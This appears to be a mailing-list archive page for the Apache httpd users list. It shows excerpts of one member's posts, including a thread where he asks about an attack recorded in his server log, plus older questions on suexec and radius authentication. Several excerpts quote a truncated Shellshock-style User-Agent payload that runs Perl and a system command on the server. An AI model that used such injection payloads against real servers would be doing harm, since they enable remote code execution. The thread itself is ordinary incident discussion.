Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
s wrong. There is no gravity. The Earth sucks. ---- *Von:* Victor Sterpu [vic...@casnt.ro] *Gesendet:* Donnerstag, 2. Juli 2015 14:29 *An:* users@httpd.apache.org *Betreff:* **SPAM?** Re: [users@httpd] Security question [wd-vc] In th

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
On 02.07.2015 17:55, Kurtis Rader wrote: On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <mailto:vic...@casnt.ro>> wrote: A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GE

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Yes. On 02.07.2015 21:16, David Grant wrote: Cgi module in php? Sent from my iPad On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /ph

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful. - Y Sent from a gizmo with a very small keyboard and hyperactive autocorrect. On Jul 2, 2015 8:00 AM, "Victor Sterpu" <mailto:vic...@casnt.ro&

[users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/

[EMAIL PROTECTED] apache 2.0.61 and mod_auth_xradius 0.4.6

2007-12-11 Thread Victor Sterpu
I use the folowing configuration: AuthType basic AuthName "Ambra-SectiunePrivata" AuthXRadiusAddServer 192.168.250.99:1900 secret AuthXRadiusTimeout 2 AuthXRadiusRetries 1 require valid-user AddHandler cgi-script .cgi Options +ExecCGI Allow from all The radius authentication is made succesfuly

Re: [EMAIL PROTECTED] perl and suexec

2006-01-28 Thread Victor Sterpu
t;Premature end of script headers". Suexec gives no error, execution is succesfuly as suexec can see. Suexec log sais just this: [2006-01-28 11:56:56]: info: (target/actual) uid: (test/test) gid: (test/test) cmd: perl Thank you. Victor Sterpu wrote: I configured apache suexec with php.

[EMAIL PROTECTED] perl and suexec

2006-01-27 Thread Victor Sterpu
I configured apache suexec with php. Now I want to do the same with apache suexec and perl, but I get a "Premature end of script headers". This is the only error in the logs. It a make su with the user of the virtual domain, I can execute succesfuly the perl program(and the result is a html pa